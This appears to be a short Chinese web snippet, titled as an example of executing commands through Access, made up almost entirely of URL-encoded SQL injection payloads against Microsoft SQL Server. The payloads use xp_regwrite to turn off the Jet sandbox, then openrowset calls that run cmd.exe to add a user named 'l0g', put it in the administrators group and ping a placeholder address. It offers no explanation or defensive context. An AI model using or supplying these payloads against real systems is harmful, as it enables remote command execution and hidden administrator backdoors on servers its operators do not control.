利用access执行命令的一个实例
;exec%20master..xp_regwrite%20'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\dnary.mdb','select%20shell("cmd.exe%20/c%20net%20user%20l0g%20l0g%20/add")'))
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\dnary.mdb','select%20shell("cmd.exe%20/c%20net%20localgroup%20administrators%20l0g%20/add")'))
net%20localgroup%20administrators%20l0g%20/add
%20and%200<>(select%20*%20from%20openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\dnary.mdb','select%20shell("cmd.exe%20/c%20ping xxx.xxx.xxx.xxx")'))
浙公网安备 33010602011771号